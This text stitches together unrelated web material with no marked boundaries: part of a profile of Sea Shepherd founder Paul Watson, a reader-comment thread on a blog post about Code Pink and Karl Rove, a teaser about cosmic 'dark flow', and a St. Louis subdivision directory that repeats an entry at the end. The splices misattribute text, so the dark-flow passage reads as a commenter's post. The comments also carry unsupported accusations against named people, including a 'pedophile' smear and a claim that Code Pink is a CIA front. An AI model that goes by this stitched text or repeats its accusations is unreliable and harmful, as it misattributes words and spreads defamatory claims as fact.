It 's hard to explain but I just suddenly realised that this guy who'd been beating on me , I was bigger than him .
So I just turned on him and fought back .
Then I left . "
After working at Expo ' 67 in Montreal , he drifted into the Canadian Coast Guard and from there into the merchant marine .
The skills Watson learned on Norwegian and Swedish freighters would prove very useful in his future career .
In 1969 , the 18 - year - old Watson became the youngest member of the Don't Make a Wave Committee .
The group – which was formed to protest American nuclear testing at Amchitka Island off the coast of Alaska – chartered two boats to sail to the islands in 1971 , which they renamed the Greenpeace I and the Greenpeace Too .
While they did n't stop the 1971 test , their protests drew so much attention that the US Atomic Energy Commission cancelled further testing .
In 1972 , Watson and the other members of Do n't Make a Wave took the name of their ships and became Greenpeace .
From 1972 to 1977 Watson served on the Greenpeace board of directors , as well as captaining and crewing many protest voyages .
On one such mission , a 1975 protest against Soviet whaling , something happened that Watson says changed his life forever : " We put ourselves between a harpoon and a whale .
They fired the harpoon over our head and hit a female from the pod .
She screamed ; it was like a woman screaming and there were fountains of blood . "
Another whale , enraged by a mortal head wound from an exploding Soviet harpoon , made as if to crush the dinghy Watson was in .
As a trail of bloody bubbles approached , Watson caught the eye of the whale .
" The easiest move at that point was to come right down on top of us .
As I looked up at that eye , rising out of the water , an eye the size of my fist ; what I saw there really changed my life forever .
Because I saw understanding .
He understood what we were trying to do .
I saw the muscles pull , and he pulled himself back and slipped under the sea to die . "
The story is clearly well rehearsed .
But Watson relates it with genuine feeling .
Nearly 35 years later , you can still hear disgust at the whalers and gratitude to the whale in his voice .
But by the late 1970s , Watson 's aggressive approach to environmental activism was increasingly putting him at odds with his pacifist Greenpeace colleagues .
In 1977 he was forced from the organisation 's board of directors by a vote of 11 to one .
Watson's was the dissenting voice .
In the years since , he has had a turbulent relationship with the organisation he helped found .
" It 's almost like being in the Russian Revolution with the Bolsheviks .
They 're trying to rewrite the history .
Now they 're saying that I 'm no longer a co-founder , I was an ' early member ' , " he says with amusement .
" I think that the best thing that ever happened to me was leaving Greenpeace . "
In 1977 , the same year he was forced to exit Greenpeace 's board of directors , Watson founded the organisation that would become the Sea Shepherd Conservation Society .
A year later the group acquired its first vessel , the Sea Shepherd , a former trawler .
Since then , Sea Shepherd 's activities have seen them go through seven ships , including the three now in operation .
The first Sea Shepherd was scuttled by Watson and his crew before it was due to be given as damages to whalers on the orders of a Portuguese judge .
Later ships – Cleveland Amory and Sea Shepherd II – were sold , while Whales Forever was badly damaged in an encounter with the Norwegian navy .
Sea Shepherd maintains that the Japanese whaler Shonan Maru No.2 was responsible for the January collision which tore open the most recent addition to their fleet , the Ady Gil .
Japan 's government - linked Institute for Cetacean Research blames Sea Shepherd .
A video of the incident was taken from the deck of Watson 's MV Bob Barker and the Australian Maritime Safety Authority is investigating the collision .
His work for the society has taken Watson around the world .
He has campaigned against Japanese , Icelandic , Russian and Norwegian whaling in the Pacific , Atlantic and Southern oceans .
Since 1979 Sea Shepherd has run a continuous campaign against the Canadian seal hunt .
Other campaigns have targeted drift net fishing and the removal of shark fins , with the fish left to die .
The organisation 's largest current campaign is working with Ecuadorian authorities to protect the Galapagos Islands from poachers and other threats .
" The Galapagos is our line in the sand .
If we can't save something as beautiful ; as profoundly unique , as pristine as the Galapagos , we can't save anything , " Watson says .
Being at sea for the most part of 30 years has n't stopped the activist from a life outside of work .
He 's been married , and divorced , three times .
His relationship with first wife Starlet Lum , a former Greenpeace activist is amicable , probably because they share a daughter , Watson explains .
Their daughter , Lani , is a video game producer who lives in Seattle .
Now married , when she was younger she accompanied her father on several voyages .
His second wife , Lisa DiStefano , was a Playboy model .
The two are not on speaking terms .
" A good example of not judging a book by its cover , " Watson laughs .
His third wife , Allison Lance , was a member of Sea Shepherd .
She now runs her own animal charity devoted to removing introduced species from island habitats .
Despite his past failings in love , Watson remains optimistic .
" I think I was n't ready for it [ marriage ] .
I think right now I 'd be more ready to devote the time and energy that a relationship requires .
Certainly I have n't in the past .
" I had to do what I had to do and unfortunately it did n't work out .
I 'm in a relationship now and I 'm having to make some hard decisions .
I do n't know where that will go , " he says .
Long - time friend and Sea Shepherd 's director of investigations , Scott West , remains amazed by his energy : " I do n't know how he does it .
I do n't know how he raised a daughter in all of this .
It 's pretty extraordinary . "
For this man of action , retirement is not an option .
He says that his stubborn streak wo n't allow him to leave the Southern Ocean until the Japanese do .
" I do n't see myself retiring , ever .
My grandfather worked ' til the day he died at 96 .
I do n't see why anyone has to retire , really .
" If you 're doing something you love and you enjoy , why would you retire ? "
The Steve Irwin trails a hauser in attempts to disable the rudder of a Japanese whaling vessel last month and ( inset ) laser beams aimed at disrupting harpoon fire .
With Terri Irwin after the naming ceremony of the vessel Steve Irwin in Melbourne , in 2007 .
Watson used the vessel to pursue Japanese whalers .
Australian activist Giles Lane soon after he leapt aboard Japanese whaling ship Yushin Maru No. 2 with Benjamin Potts , right , in January 2008 .
The Ady Gil shortly after it was rammed by Japanese whaling vessel Shonan Maru No. 2 , in the background , in Antarctic waters in January .
Japanese harpoon ship Yushin Maru No. 1 fires water cannons on Sea Shepherd crew in New Zealand waters last month .
Photos : Sea Shepherd Conservation Society .
Sea Shepherd locates Nisshin Maru 100 nautical miles from Australia 's Davis Station in eastern Antarctica last month .
The Japanese ship Yushin Maru harpoons a whale in the Southern Ocean off Antarctica .
It took four harpoon shots to kill the whale .
READER COMMENTS ON
" Exclusive : CODE PINK Attempts Another Citizens Arrest on Karl Rove , This Time in Vegas "
( 26 Responses so far ... )
COMMENT # 1 [ Permalink ]
... cult of skaro 23 said on 4/9/2010 @ 3:57 pm PT ...
are they serious about this or is it a symbolic gesture , because I 'm pretty sure they could actually do it .
COMMENT # 2 [ Permalink ]
... Shannon Williford said on 4/9/2010 @ 4:04 pm PT ...
Go Pink !
shw
COMMENT # 3 [ Permalink ]
... beach said on 4/9/2010 @ 4:51 pm PT ...
can these liberals get any kookier !
COMMENT # 4 [ Permalink ]
... Tunga said on 4/9/2010 @ 4:51 pm PT ...
This story appeared in 2007 and claims Code PInk is a CIA front .
Is that true ?
http://rockthetruth.blog...front-of-controlled.html
Scuttlebutt also says Wikileaks is cut from the same cloth .
We think Rove is a perverted pedophile but the effect of this protest evokes sympathy for his criminal existence .
COMMENT #5 [ Permalink ]
... Tunga said on 4/9/2010 @ 5:00 pm PT ...
From the link posted above ;
In fact , Billzilla knows perfectly well Medea Benjamin and Code Pink are no threat to the established order , a fact that should be obvious when Code Pink ’s finances are examined — the group is supported by the Winston Foundation , an organization linked to the National Endowment for Democracy , a documented CIA front , and connected as well to the Rockefeller Family Fund , the Carnegie Corporation , the Heinz Family Foundation , and the Soros Foundations ( see the Zmag wiki entry for the Winston Foundation for World Peace ) . " - end snip
COMMENT #6 [ Permalink ]
... David Lasagna said on 4/9/2010 @ 8:25 pm PT ...
Code Pink being a CIA front is about as likely as Karl Rove being Shaquille O'Neal .
COMMENT # 7 [ Permalink ]
... David Lasagna said on 4/9/2010 @ 8:32 pm PT ...
Yeah , those Code Pinksters are rolling in dough .
That 's how they control the media so effectively .
They 're just like Murdoch .
They see a newspaper they like , they buy it .
Now if you 'll excuse me , I have a date on planet Earth .
COMMENT #8 [ Permalink ]
... David Lasagna said on 4/9/2010 @ 8:34 pm PT ...
I heard the sun is really a flashlight .
COMMENT #9 [ Permalink ]
... David Lasagna said on 4/9/2010 @ 8:35 pm PT ...
I think my hair is on fire .
COMMENT # 10 [ Permalink ]
... Big Dan said on 4/9/2010 @ 8:48 pm PT ...
I videoed Cindy Sheehan in Scranton today , reading the Bishop 's statement about not letting her speak in Scranton : http://www.youtube.com/watch?v=0afLo7g3RaM
COMMENT # 11 [ Permalink ]
... David Lasagna said on 4/9/2010 @ 10:19 pm PT ...
Dear Tunga , Sorry for the aggressive humor shots .
Do n't think you deserved that .
Weird day .
There 's so much crazy shit flying around .
I got impatient .
Do n't think Code Pink is a front group .
COMMENT # 12 [ Permalink ]
... Nathan said on 4/9/2010 @ 11:02 pm PT ...
He really needs security .
I do n't care what your personal opinions of him are .
He 's a private citizen and a human -- although a very flawed one .
COMMENT # 13 [ Permalink ]
... Kenneth Fingeret said on 4/10/2010 @ 12:27 am PT ...
Hello Nathan ,
Yes he really needs security .
I suggest as a war criminal ( A fair trial first ) GITMO ( after conviction ) ( I hear the climate is good most of the year ) and his clothing an orange jumpsuit ( keeps the wardrobe budget down ) .
If we are not willing to do to ourselves as Justice Robert Jackson said about the Nuremberg Trials then we are as guilty as the defendants who were put on trial .
COMMENT # 14 [ Permalink ]
... Chris Hooten said on 4/10/2010 @ 3:24 am PT ...
Code Pink = CIA ?
Uhmm , No .
Rove = scumbag ?
Uhmm , Yes .
I want a corn dog ?
Uhmm , corn dog .
What was I talking about ?
COMMENT # 15 [ Permalink ]
... mikey said on 4/10/2010 @ 10:57 am PT ...
We get to the table , he looks up to take my book and jumps back against the book shelves , " Evans says .
He then points to three security guards and says " it 's her , " before the guards " pile in , " according to her account , I love it and only wished it would have been a gang of US Marshalls backing her and they
hustled him away in cuffs with a large sedative suppository on an unmarked plane ... destination unknown .
COMMENT # 16 [ Permalink ]
... daleyrocks said on 4/10/2010 @ 1:47 pm PT ...
I 'd like to see the loons here laugh if James O'Keefe tried a citizens arrest of Bertha Lewis at some speaking event .
Jerry Brown listed some possibilities for prosecution in his report which he chose not to pursue .
That would be big yucks all around !
COMMENT # 17 [ Permalink ]
... Brad Friedman said on 4/10/2010 @ 2:02 pm PT ...
DaleyRocks , running out of ideas , said : I 'd like to see the loons here laugh if James O'Keefe tried a citizens arrest of Bertha Lewis at some speaking event .
But of course , there is no evidence that Bertha Lewis is involved in any crime whatsoever .
None .
Unless you have evidence to the contrary , please share it .
In the meantime , there is copious , well - documented evidence that Rove was involved in crime after crime , including the outing of a covert CIA asset --- a crime once described as treason , but Liberals and pinkos like George H.W. Bush .
But thanks for the false equivalency !
It 's better than actually giving a damn about the Rule of Law or the Constitution or anything .
If you care to join us in such conservative values some day , we 'll gladly welcome you on the team of patriots .
COMMENT # 18 [ Permalink ]
... Chris Hooten said on 4/10/2010 @ 3:19 pm PT ...
That would be awesome , DaleyRocks .
That is just what O'Keefe needs is more legal trouble .
What would he arrest her for , though ?
What did she do ?
What in the world do you think Bertha Lewis did ?
BTW , who do you think had the male prostitute sleepovers at the white house during the bush years ?
What , you did n't know about those , DaleyRocks ?
You know , the phony journalist that somehow got press credentials , but was also a male escort on another web site .
You know , this guy .
Many days he signed into the white house , and never signed out , often when there was no press activity .
COMMENT # 19 [ Permalink ]
... Big Dan said on 4/10/2010 @ 5:31 pm PT ...
Methinks Daleyrocks is the rightwing comment propaganda " ACORN guy " .
COMMENT # 20 [ Permalink ]
... daleyrocks said on 4/10/2010 @ 11:11 pm PT ...
" In the meantime , there is copious , well - documented evidence that Rove was involved in crime after crime , including the outing of a covert CIA asset " Bead -
Only if you believe in the tooth fairy .
Nobody has proved that Valerie Plame was covert in spite of repeated liberal assertions ( read big lie ) that she was .
Her husband and Dick Armitage were the ones that " outed " her if there was anything to out .
Sorry , no sale .
COMMENT # 21 [ Permalink ]
... David Lasagna said on 4/11/2010 @ 9:17 am PT ...
Daleyrocks -
You would n't even know to buy your own dick if you were beating off with one hand and trying to pay yourself with the other .
And I 've got some video from O'Keefe showing you doing just that .
COMMENT # 22 [ Permalink ]
... colinjames said on 4/11/2010 @ 9:25 am PT ...
" nobody has ever proved that Valerie Plame was covert ... " has anyone ever proved she was n't ?
NO .
And how , pray tell , do you " prove " someone was a covert spy ?
Fact is , Cheney / Rove / Bush sacrificed the lives of other covert spies and foreign CI 's so their whole publicly stated reason for invading Iraq - imminent threat due to WMDs - would n't be exposed as the REAL big lie it turned out to be .
Oh , and in the process , they made us all a lot less safe by destroying an entire intelligence network tasked with keeping us safe from REAL threats of WMDs .
COMMENT # 23 [ Permalink ]
... Ancient said on 4/11/2010 @ 11:33 am PT ...
I think this is a fitting place to post my OT ...
" Tacitus ends his account of Tiberius ’s reign with Rome in misery ; however , this universal sense of gloom that is shared by the people , Tiberius , Tacitus , and his readers is proof that man ’s sense of and longing for the good is fragile but indomitable .
Though it is easily obscured by base desires and one ’s immediate social reality and lack of foresight , it can always be reawakened by reflection .
Thus , Tacitus writes , “ This I regard as history ’s highest function , to let no worthy action be uncommemorated , and to hold out the reprobation of posterity as a terror to evil words and deeds ” ( III.65 ) .
In the Annals , Tacitus announces and fulfills an historian ’s duty to present the reality of good and evil in the time on which he writes .
By this , readers may come to see that the root of despotism lies in our shared human character , a realization that encourages us to look upon ourselves and our societies with new and clear eyes . "
... my daughter .
COMMENT # 24 [ Permalink ]
... Brad Friedman said on 4/11/2010 @ 1:27 pm PT ...
DaleyRocks blatantly lied @ 20 : " Bead - Only if you believe in the tooth fairy .
Nobody has proved that Valerie Plame was covert in spite of repeated liberal assertions ( read big lie ) that she was . "
Alrighty then .
I have been exceedingly generous in allowing you to post here unmoderated , dozens and dozens of times over the last several months --- despite your proclivity , like the other Andy Breitbart Tea Bag Boyz to lie on O'Keefe / Giles / Breitbart 's behalf --- in hopes that your positions , as phony as they were , might help folks to understand the real story , and the depths to which you guys were willing to go to undermine it , democracy , fellow citizens , and shoot out the very points of light which your former President had many times cited as key to America 's greatness as a nation , in your quest to put partisan politics above all this country stands for .
With the above statement , however , you 've succeeded in blatantly violating one of the very few , but key rules for commenting at The BRAD BLOG .
You have posted " knowing disinformation " .
While I might give someone else the benefit of the doubt that they 've been so twisted with rightwing lies they do n't actually know that statement to be disinfo , we 've all followed your " work " closely enough both here and at the contemptible Los Angeles County Dep. D.A. Patrick Frey 's " pseudonymous " website called " Patterico 's Pontifications " , that it 's clear even you know when you 're lying about something so blatantly proven to be false for so many years .
Normally , you 'd get a warning , but you have long worn out the " benefit of the doubt " , so you are now , for the time being , on moderation .
Your comments will either be posted or not , depending on whether they violate our rules , and whenever I get around to approving them .
For the record , there is absolutely no question that Valerie Plame Wilson was a covert CIA asset when she was illegally outed by various members of the Bush Administration , unless by one of those ' big liberal liars ' you 're referring to George W. Bush 's own CIA Director Michael Hayden who confirmed as much vis a vis a statement read in Congress and pre-approved by Hayden 's own CIA .
As per Rep. Henry Waxman 's official , unequivocal March 16 , 2007 statement , in the U.S. Congress , cleared by CIA Director Hayden prior to it 's reading , following consultation with Hayden himself : " During her employment at the CIA , Ms. Wilson was undercover .
Her employment status with the CIA was classified information , prohibited from disclosure under Executive Order 12958 .
At the time of the publication of Robert Novak 's column on July 14 , 2003 , Ms. Wilson 's CIA employment status was covert .
This was classified information .
Ms. Wilson served in senior management positions at the CIA in which she oversaw the work for other CIA employees and she attained the level of GS - 14 — Step Six under the federal pay scale .
Ms. Wilson worked on some of the most sensitive and highly secretive matters handled by the CIA .
Ms. Wilson served at various times overseas for the CIA . "
That statement was followed by Plame Wilson 's own under - oath statement to Congress , which read in part : " In the run-up to the war with Iraq , I worked in the Counterproliferation Division of the CIA , still as a covert officer whose affiliation with the CIA was classified .
I raced to discover solid intelligence for senior policy makers on Iraq 's presumed weapons of mass destruction program .
While I helped to manage and run secret worldwide operations against this WMD target from CIA headquarters in Washington , I also traveled to foreign countries on secret missions to find vital intelligence . "
As we detailed , live on the day she and Waxman made those on - the - record , under - oath announcements , the same statements were repeated over and again , in additional detail , under the same oath and penalties of perjuries .
They have never been challenged by a member of Congress or in a court of law as untruthful .
Furthermore , that other ' big liberal liar ' , the Republican - appointed Special Counsel Patrick Fitzgerald himself , similar confirmed the fact that she was a covert CIA operative in his court documents filed prior to Libby 's sentencing to several years in prison ( which he never served , because Rightwingers like yourself do n't give a damn about the Rule of Law , the Constitution , or even Treason ) .
As Fitzgerald wrote in court documents : Ms. Wilson was a covert CIA employee for whom the CIA was taking affirmative measures to conceal her intelligence relationship to the United States ...
When traveling overseas , [ Plame ] always traveled under a cover identity [ undercover ] , sometimes in true name and sometimes in alias --- but always using cover --- whether official or non-official ( NOC ) --- with no ostensible relationship to the CIA .
And , in case you forgot what decency was all about , and how despicable this outing was , and how it undermined our very own nation 's security , I 'll remind you what George W. Bush 's own father , former CIA Director George H.W.
Bush said when he spoke to the CIA in 1999 , back before you people had jumped every legitimacy shark in the ocean : " I have nothing but contempt and anger for those who betray the trust by exposing the name of our sources .
They are , in my view , the most insidious of traitors . "
As the saying goes DaleyRocks , you are welcome to your own opinions , but you are not welcome to your own facts .
You are also , similarly , not welcome to come here and blatantly , and knowingly lie about them .
I 'm sorry that , like so many of your unapologetic rightwing brethren , you 've put party before country and lies before truth , and disinformation on behalf of those who commit treason over accountability and the rule of law .
It would have been nice to allow you to post here unmoderated .
Since you have chosen to act like a child , you are no longer welcome to do so , I 'm sorry to say .
COMMENT # 25 [ Permalink ]
... Dan-in - PA said on 4/11/2010 @ 2:08 pm PT ...
Perhaps doucheyrocks refers to the exposure of Ms Plame 's covert operation by Marc Grossman , as was detailed by FBI translator Sibel Edmonds , 3 yeas before her actual identity was as an agent was made known to the press ?
If her covert operation is exposed and subsequently forced to wind down , is she still covert ?
Her boss , CIA director George Tenet , seemed to think she was still covert .
But what could he possibly know ?
He was clearly a liberal in disguise !
COMMENT # 26 [ Permalink ]
... Dan-in - PA said on 4/11/2010 @ 5:19 pm PT ...
Investigating the discovery of what is ominously being called ' dark flow ' , a phenomenon which could mean scientists might have to find a new way of understanding the universe .
There 's something very odd going on in space - something that should n't be possible .
It is as though vast swathes of the universe are being hoovered up by a vast and unseen celestial vacuum cleaner .
Sasha Kaslinsky , the scientist who discovered the phenomenon , is understandably nervous : ' It left us quite unsettled and jittery ' he says , ' because this is not something we planned to find ' .
The accidental discovery of what is ominously being called ' dark flow ' not only has implications for the destinies of large numbers of galaxies - it also means that large numbers of scientists might have to find a new way of understanding the universe .
Dark flow is the latest in a long line of phenomena that have threatened to rewrite the textbooks .
Does it herald a new era of understanding , or does it simply mean that everything we know about the universe is wrong ?
Pageviews last month
Subdivision Profiles Welcome to Subdivision Trustees where trustees can exchange information and seek advice from trustees with other subdivisions and neighborhood associations .
This site is designed to serve the entire St. Louis Metro area .
It is operated independently and is not a service of St. Louis County or the City of St. Louis .
Your comments and input are welcome .
Thanks for visiting .
Send In Your Subdivision News
This web site is only as good as you make it .
Share your subdivision news and information with other trustees .
Write an article or just comment on articles .
Send your information to us at subtrustees@swbell.net
Antonette Hills ( 63123 )
We are located in the heart of Affton approximately 1/2 mile south on Dana Ave . which is just east of where Gravois and Weber Road intersect .
Our subdivision was built in 1975 - 76 .
St. George Creek runs through our subdivision of 62 homes with 43 homes on the north side and 19 homes on the south side of the creek .
Our annual assessment is $ 95 to include street lighting , common ground maintenance , financial accounting and insurance .
Brookdale Subdivision - 63146
Located in the heart of St. Louis County , Brookdale has 218 homes and is close to everything .
We are situated near Page and I - 270 , as well as Lindbergh and Olive .
Built in 1964 , the price range on homes is $ 185,000 to $ 280,000 .
We have an annual subdivision assessment fee , currently at $ 75 a year per household for street lights , Common Ground Maint. , newsletter , Ins. , entrances and other subdivision expenses .
Cambridge Pointe Subdivision - 63129 Located off Heintz road in Oakville , we have 65 homes .
Our annual assessment is $ 300 which covers lighting , common ground maintenance , insurance , and trash .
We do not currently have a subdivision website .
Chalet Forest ( 63129 ) Chalet Forest has 148 homes , built in 1977 .
Price range for most homes : $ 170,000 to $ 210,000 .
Located off Baumgartner Road Near Telegraph .
Annual assessment is $ 75 .
Assessment covers lighting , common ground and insurance .
Chestnut Park ( 63129 ) Started in 1966 and built through 1980 .
Include 351 homes .
Price range for most is $ 170,000 to $ 250,000 .
Located between Milburn and Telegraph Road and bounded on south by Yaeger Road .
Annual assessment is $ 35 for mainly lighting .
Clayshire Ridge ( 63105 ) Number of Homes : 40
Subdivision built from 1949 - 1953 .
The price range for most homes : $ 275,000 - $ 825,000 .
We are located at the western edge of Clayton , MO .
We do not have an annual assessment as we are not a private subdivision any more as Clayton takes care of us .
Concordia Village Subdivision ( 63128 ) Number of Homes : 48 .
Subdivision began in 1976 .
Price range for most homes is from $ 285,000 to 430,000 .
Located at Concord School Road & Roxanna .
Annual assessment ?
$ 100.00 per lot to cover Street lighting , common ground maintenance , bonding of trustees .
Courtyards of Sunset Hills ( 63127 ) No. of homes : 49
Subdivision built in : 1988 to 1999
Market Price range : $ 425 K to $ 570 K
General location : Lindbergh Blvd & Eddie & Park Road
Annual assessment : $ 1,800 to $ 2,100
Assessment covers : trash pick up , street lights , snow removal , lawn maintenance , lawn sprinkler system
Cyrstal Creek Place ( 63125 )
We are located at 3255 Union road , 1 mile north of Lindbergh and just south of Will road .
We are directly across the street from the Grasso / St. Mark Athletic fields .
Our 61 homes were build built from 1992 – 94 .
Annual assessment is $ 150 .
We have electric lighting , common ground , cul - de-sac and retention pond lawn and shrub maintenance as well as entrance monument maintenance .
Home prices range $ 225,000 to $ 275,000 .
Golden Gables ( 63129 ) Built in 1963 - 64 in South County .
Located near I - 255 & Telegraph Rd. Have 87 homes .
Annual assessment $ 50 .
Have common ground park area , entrance with lighting , brick and stone work & two circles with landscape maintenance .
Home prices : $ 150,000 - $ 200,000 .
Hagemann Crossing Built in 1987 at Tesson Ferry at Hagemann Rds. Have 50 homes .
Annual assessment is $ 135 .
Have common ground grass cutting , electric lighting , circle mulching and pruning , some tree trimming along Hagemann Rd. and entrance monument maintenance and replacement etc .
Home price range $ 250,000 to $ 350,000 .
Herman 's Orchard ( North County Our subdivision is located in North County and was built in 2004 - 2005 .
Home values are $ 230,000 - $ 400,000 .
Highland Estates Subdivision ( 63129 )
Number of homes : 59
Started building around 1985
Value of homes today range from $ 265 to $ 330,000
Located in Oakville off Telegraph
Annual Assessment is $ 300 .
Includes twice a week trash pick - up , Cul - de- sac Maintenance , Common Ground Maintenance , Insurance and Subdivision Lighting
Karington Place Built in 1994 , we have 35 homes .
Price range is from $ 325,000 to $ 650,000 .
Located at Ringer and Mehl in Oakville .
Annual assessment is $ 300 to include trash pick - up , lighted entrance , common ground cutting and maintenance of cul - de- sacs , also addition street lighting .
Kerth Forest ( 63128 ) Number of Homes : 16
Subdivision built from 1997 to 2000 .
The price range for most homes is $ 300,000 to $ 325,000 .
Located at Highway 55 & Meramec Bottom Rd. Annual assessment is $ 155.00 and covers lighting , common ground maintenance , insurance .
The Meadows at Quail Creek ( 63128 ) Number of Homes : 200
Subdivision built from ) 1998 to approx 2002
Price range for most homes : $ 350,000 to $ 410,000 current estimated values
General Location : Southwest county
Annual assessment is $ 325 which is used for lighting , common ground maintenance , and maintance of two retention ponds .
Does not include pool and trash pickup .
Oakleigh Woods
Our subdivision is located in Ballwin , Missouri , a municipality located approximately 15 miles West of the St. Louis City Limits .
Oakleigh Woods stands out with its small town atmosphere of 104 homes .
Paddock Forest Paddock Forest , located in North St. Louis County , near the intersection of Hwy .
367 and Parker Road , consists of 434 single family homes , 270 condominium units in three separate developments , 130 acres of wooded common ground with meadows and two lakes .
Construction started in 1966 .
Paddock Forest was the first subdivision in St. Louis County to be built under the Planned Environment Unit Procedure .
All single family homes have two car garages .
Square footage ranges from 1,500 - 3,000 .
Annual assessment is currently $ 115.00 for single family homes and $ 28.75 for condominium units , which pays for mowing of 50 + acres common ground , tree removal and upkeep , entrance islands , 63 dusk to dawn street lights , insurance , newsletters , as well as other communications .
Sale prices of homes range between $ 150,000 - $ 220,000 .
The single family homeowners association is governed by a five member board of directors .
Parc Argonne Forest , Third Addition
Our subdivision was started in 1984 and has 147 homes .
We are located in North County between New Halls Ferry and Old Halls Ferry .
Price range on our homes is $ 157,000 to $ 200,000 .
Queen Anne Village Subdivision Queen Anne Village subdivision consists of 80 homes and 90 condominiums located in unincorporated west St. Louis county near the Jewish Community Center in Creve Coeur .
Established in 1966 , the community boasts a private 6 acre park with a serene stocked lake .
The condominiums offer a swimming pool and clubhouse .
Market values range between $ 250,000 and $ 300,000 for homes and $ 150,00 and $ 250,00 for condos .
Separate boards govern the homeowners association and the condominium association .
Current homeowners assessments are $ 90 per lot , which covers the cost of lighting , insurance and common area maintenance .
Condominium fees are undisclosed .
Ridgemoore Place ( 63129 ) Ridgemoor Place Homeowners Association , 15 Homes with Last home built in 1995 , Price range $ 390,000 to $ 600,000 , Location near Kerth & Butler Hill roads , Annual Assessment = $ 325 to pay for upkeep of common grounds - entrance signs , electric , lawn cutting , landscaping , insurance cost is $ 400 .
River Walk at Bee Tree Park - 63129
We are located in the southern part of Unincorporated St. Louis County off of Becker Road and adjacent to the entrance to St. Louis County Bee Tree Park near the confluence of the Meramec and Mississippi rivers .
There are fourteen acres of common ground which allows most homes to have woods behind each home .
The subdivision , consisting of one and two story homes , was built between 1990 and 1995 and has 64 homes , ranging in price from $ 250,000 t0 $ 350,000 , on one - third acre and larger lots .
Our annual assessment has been maintained at $ 100 per year for the last twenty - two years and is used to pay the monthly electric bill for the Street Lights , Maintenance of two Cul - de - Sacs and one Retention Basin , Liability Insurance for the common ground , annual Registration with the State of Missouri , and periodic attorneys fees for indenture changes .
Shenandoah The Shenandoah Subdivision consists of 495 residential homesites located in the City of Chesterfield , Mo. in the Shenandoah Valley School , K - 5 , which is part of the Parkway School system .
Real estate values range between $ 200,000 and $ 300,000 .
Complimenting the homesites is over 50 acres of common ground which may be used for recreation or just left as green space or wooded area .
Silver Leaf's Subdivision ( 63128 )
We have 36 homes , built in 1976/77/78 .
The price of homes ranges from $ 150,000 - $ 300,000 .
We are located off of Hwy 21 by St. Anthony 's Hospital in zip code 63128 .
Our annual assessment $ 65 - street lighting .
Tealridge Improvement Association Built in 1959 thru 1964 in the 10000 block of Gravois .
We have 120 homes valued at approximately $ 190,000 .
Our annual assessment is $ 20 which covers lighting and upkeep of the entranceway .
Timber Hills ( 63128 )
We have 42 Townhouse Condos and 144 Garden Apartment Condos .
Built in 1988 , the price ranges are $ 175,000 for townhouses and $ 100,000 for garden apartment condos .
We are located in the southwest quadrant of I - 55 and I -270 .
Our assessment is used for street cleaning , general maintenance , water , sewer and electric maintenance .
The assessment is $ 2316 a year for the Townhouses and $ 1,500 for the Garden Apartments .
Towne South ( 63128 ) Started in 1962 by FISHER & FRICHTEL Development CORP .
The homeowners association was recorded with the St. Louis county recorder of deeds and Secretary of State in MAY 1962 .
Towne South consists of 715 Homes .
We are bordered by Old Tession Ferry Rd. on the west , Mattis Rd. on the North , and Kerth Rd. on the East .
There are approximately 35 acres of common ground spread through the subdivision , mostly along creek lines .
There are 15 dusk - to - dawn lights and 3 entrances with lights .
Annual assessment is $ 50 per year .
The average home is now selling between $ 160,000 &$ 215,000
Village at Paddock Lake Built in the 1990s , we have 73 units , all are duplex units , single level , except for one .
Prices range from , $ 90,000 to $ 130,000 based on unit size - from 1000 - 16000 sq. ft. Located in north County , in general area West of Partridge run and north of Parker road .
Annual condo fees range from $ 1450 to $ 2260 , based on size .
The fees include - street lighting , street repairs and maint. , common ground , trash , sewer , water , interior security system , entry / exit gate operation with coded entry system , clubhouse , lawn / snow maint .
landscaping , unit exterior maint .
We are an adult community , under Federal Public law -
The older persons act of 1995 , wherein , a resident must be over 55 , have no children living with him under the age of 18 , and only 3 residents to a home .
Waycliffe Estates ( 63011 ) Located in Ballwin with 130 homes .
Most in the $ 200,000 range .
Annual assessment is $ 10 .
Woodsmill Subdivision , Ballwin , MO. 63011 Woodsmill Subdivision was built in the late 1960 ’s by Cassilly Realty Co. which was located in Webster Groves , MO .
The design called for 269 single family detached homes and roughly 27 acres of common ground .
Construction on the majority of the homes was completed between 1967 and 1970 .
The last home , at 812 Dutch Mill , was completed in mid 1971 .
The Woodsmill Clubhouse was the original structure on the roughly 116 acre farm .
Prior to the subdivision construction , part of the clubhouse was used as a tack room ( to store bridles and saddles ) for the farms horses .
Originally Woodsmill Subdivision was in unincorporated St. Louis County but was annexed by the City of Ballwin in 1996 .
Woodsmill Subdivision is located in West St. Louis County in the City of Ballwin , Missouri .
We are conveniently located approximately 2.5 miles south of Highway 40 ( I - 64 ) on Highway 141 ( Woods Mill Road ) .
Henry Avenue borders the west side of our community and allows easy access to Clayton Road to the north and Manchester Road to the south .
Bordering our community to the south / west is the highly rated Parkway Elementary school ( Henry Elementary ) .
Westglen Village & South Subdivision - Ballwin Westglen Village and South Subdivision is located in the southwest corner of the city of Ballwin , in west St. Louis County .
Our subdivision consists of 492 single family homes built in the mid 1970's , and an 80 unit apartment complex .
We offer tree - lined streets , several areas of attractive common ground , and a subdivision swimming pool .
Subdivision dues are $ 200.00 per single family home .
The invoice amount is due in full by March 31st .
This assessment is used for : the maintenance and management of the pool ; the maintenance of common ground , monuments , walkways , and lights ; and for the cost of phones , post office box , signs , and various other subdivision expenses .
Westminster Estates Subdivision 2 ( 63126 )
Number of homes : 41
Built in 1953 - 19554 .
County assessed valuation : $ 195,00 to $ 364,400 ( the lowest and the highest right next door to each other )
General Location : Sappington and Gravois , subdivision entrance next to Ameren U. E. power substation6 .
63126
$ 15 general assessment for lighting , entrance upkeep ( shrubbery , landscaping , etc. ) , insurance , clerical , rental space for meetings , etc .
Special assessments provided for in indentures
Whitmoor Subdivision
The website is overseen by the subdivision 's Homeowners ' Association .
For more information , please visit their website at
Whitmoor Subdivision is located in beautiful Weldon Spring Missouri , just off of Wolfrum Road .
Consisting of approximately 600 homes , the subdivision exists in and around the grounds of the Whitmoor Country Club .
The website is overseen by the subdivision 's Homeowners ' Association .
For more information , please visit their website at http://www.whitmoor.org
Woodleigh Estates ( 63129 ) Started in 1971 , includes 222 homes located at Telegraph Road and Whitshire Drive .
Assessment amount is $ 100 which includes street lighting ; insurance and common ground and cul de sac maintenance .
Within walking distance of Cliff Cave Library and St. Francis of Assissi Church and School .
New Mehlville Firehouse to be built next to entranceway of subdivision .
Current price range is $ 175,000 to $ 230,000 .
Woodsmill Subdivision , Ballwin , MO. 63011 Woodsmill Subdivision was built in the late 1960 ’s by Cassilly Realty Co. which was located in Webster Groves , MO .
The design called for 269 single family detached homes and roughly 27 acres of common ground .
